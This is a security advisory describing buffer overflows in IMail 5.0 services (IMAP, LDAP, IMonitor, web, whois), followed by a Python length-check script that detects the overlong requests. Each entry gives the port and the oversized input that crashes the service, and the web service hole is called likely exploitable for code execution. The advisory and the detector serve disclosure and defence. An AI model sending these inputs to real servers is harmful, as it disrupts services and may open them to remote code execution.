Vulnerability

    Multiple IMail Vulnerabilities

Affected

    IMail 5.0

Description

    The following is based on an eEye Digital Security Team advisory.
    The holes below can be used as a Denial of Service against the
    various services mentioned, and in some cases to remotely execute
    code.

    Imapd (143)
    ===========
    The imapd login process does not do proper bounds checking on
    usernames and passwords.

        * OK IMAP4 Server (IMail 4.06)
        X LOGIN glob1 glob2

    Where glob1 is 1200 characters and glob2 is 1300 characters. The
    imapd service will crash with the usual overflow error.

    LDAP (389)
    ==========
    Telnet to server.com 389

        Send: Y glob1
        hit enter twice
        Server Returns: 0
        Send: Y glob2
        hit enter

    Where glob1 and glob2 are 2375 characters and Y is Y. The ldap
    service goes to 90 percent or so and idles there, using up most
    system resources.

    IMonitor (8181)
    ===============
    Telnet to server.com 8181

        Send: glob1
        hit enter twice

    Where glob1 is 2045 characters. The IMonitor service crashes with
    the normal overflow message.

    IMail Web Service (8383)
    ========================
    Telnet to server.com 8383

        Send: GET /glob1/

    Where glob1 is 3000 characters. The usual overflow message will be
    displayed. This one looks to be easily exploitable.

    Whois32 Daemon (43)
    ===================
    Telnet to server.com 43

        Send: glob1

    Where glob1 is 1000 characters. The usual overflow message will be
    displayed. Ya... starting to sound old.

Solution

    Vendor has been notified; waiting for response...
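Every hole above is triggered by a single oversized field on a known port, so a length check in front of the services can flag the requests. The following is an added detection example, not part of the eEye advisory or the vendor's code; the 512-character limit, the function names and the sample lines are assumptions made for illustration.

```python
# Added example: flag request fields long enough to match the advisory's
# crash conditions. LIMIT is an assumed policy value, not a vendor figure.
LIMIT = 512

# Ports and services named in the advisory.
SERVICES = {143: "imapd", 389: "ldap", 8181: "imonitor",
            8383: "web", 43: "whois"}

def fields(port, line):
    """Split one request line into the named fields the advisory overflows."""
    line = line.rstrip("\r\n")
    parts = line.split()
    # IMAP: "<tag> LOGIN <username> <password>"
    if port == 143 and len(parts) >= 3 and parts[1].upper() == "LOGIN":
        out = [("username", parts[2])]
        if len(parts) >= 4:
            out.append(("password", parts[3]))
        return out
    # Web service: "GET <path> ..."
    if port == 8383 and len(parts) >= 2 and parts[0].upper() == "GET":
        return [("path", parts[1])]
    # LDAP, IMonitor and whois cases: the whole line is the field.
    return [("line", line)]

def oversized(port, line, limit=LIMIT):
    """Return [(service, field, length)] for every field over the limit."""
    if port not in SERVICES:
        return []
    return [(SERVICES[port], name, len(value))
            for name, value in fields(port, line) if len(value) > limit]

# Constructed sample traffic as (port, request line); not captured data.
SAMPLES = [
    (143, "X LOGIN alice secret"),
    (143, "X LOGIN " + "a" * 1200 + " " + "b" * 1300),
    (8383, "GET /index.html HTTP/1.0"),
    (8383, "GET /" + "c" * 3000 + "/"),
    (43, "example.com"),
    (43, "d" * 1000),
]

def scan(samples=SAMPLES):
    """Run the length check over every sample and collect the hits."""
    return [hit for port, line in samples for hit in oversized(port, line)]

if __name__ == "__main__":
    for service, name, length in scan():
        print(f"{service}: {name} is {length} characters (limit {LIMIT})")
```

The same per-field limits can be enforced in a proxy or filter in front of the listed ports until a vendor fix is available.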